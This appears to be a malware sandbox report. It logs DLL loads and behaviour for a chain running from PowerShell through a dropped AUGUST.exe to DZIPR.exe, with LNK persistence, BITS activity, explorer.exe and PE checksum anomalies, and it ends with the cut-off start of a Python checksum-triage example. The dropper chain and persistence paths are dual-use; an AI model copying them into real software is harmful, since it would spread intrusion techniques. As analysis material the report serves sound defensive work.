Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DZIPR.exe Section loaded: apphelp.dll
Source: C:\Users\user\DZIPR.exe Section loaded: version.dll
Source: C:\Users\user\DZIPR.exe Section loaded: mpr.dll
Source: C:\Users\user\DZIPR.exe Section loaded: wininet.dll
Source: C:\Users\user\DZIPR.exe Section loaded: urlmon.dll
Source: C:\Users\user\DZIPR.exe Section loaded: dzipr.dll
Source: C:\Users\user\DZIPR.exe Section loaded: winmm.dll
Source: C:\Users\user\DZIPR.exe Section loaded: iertutil.dll
Source: C:\Users\user\DZIPR.exe Section loaded: srvcli.dll
Source: C:\Users\user\DZIPR.exe Section loaded: netutils.dll
Source: C:\Users\user\DZIPR.exe Section loaded: dbghelp.dll
Source: C:\Users\user\DZIPR.exe Section loaded: pla.dll
Source: C:\Users\user\DZIPR.exe Section loaded: pdh.dll
Source: C:\Users\user\DZIPR.exe Section loaded: tdh.dll
Source: C:\Users\user\DZIPR.exe Section loaded: cabinet.dll
Source: C:\Users\user\DZIPR.exe Section loaded: wevtapi.dll
Source: C:\Users\user\DZIPR.exe Section loaded: shdocvw.dll
Source: C:\Users\user\DZIPR.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dzipr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mstask.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dzipr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mstask.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: uvnhjq.19.dr LNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
Source: BIT2369.tmp.21.dr LNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 16_2_00406D5D
Source: gps.28.dr Static PE information: real checksum: 0x0 should be: 0x7d505
Source: DZIPR.dll.17.dr Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: DZIPR.dll.16.dr Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: AUGUST.exe.11.dr Static PE information: real checksum: 0x33302 should be: 0x4a3c93
Source: demhwk.19.dr Static PE information: real checksum: 0x0 should be: 0x7d505
Source: qapuwvr.24.dr Static PE information: real checksum: 0x0 should be: 0x7d505
Source: DZIPR.exe.16.dr Static PE information: section name: .didata
Source: DZIPR.exe.17.dr Static PE information: section name: .didata
Source: demhwk.19.dr Static PE information: section name: cmxvoc
Source: qapuwvr.24.dr Static PE information: section name: cmxvoc
Source: gps.28.dr Static PE information: section name: cmxvoc
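The Static PE information lines above record two things a triage analyst should be able to reproduce offline: a stored CheckSum that disagrees with the recomputed one (0x0 for the extension-less %TEMP% drops demhwk, qapuwvr and gps; 0x601f9 against 0x5ee7e for DZIPR.dll) and a section named cmxvoc that no mainstream linker emits. The Python below is an added example written for this page, not code from the sandbox vendor or from the sample: it recomputes the image checksum with the DWORD-sum arithmetic that imagehlp!MapFileAndCheckSum uses, compares it with the header field, and lists section names outside a small set of well-known linker names. The build_toy_pe skeleton and the KNOWN_SECTIONS list are constructed for the example and are not from the report.

```python
import struct

# Section names expected from mainstream linkers (MSVC, MinGW, Delphi). Constructed
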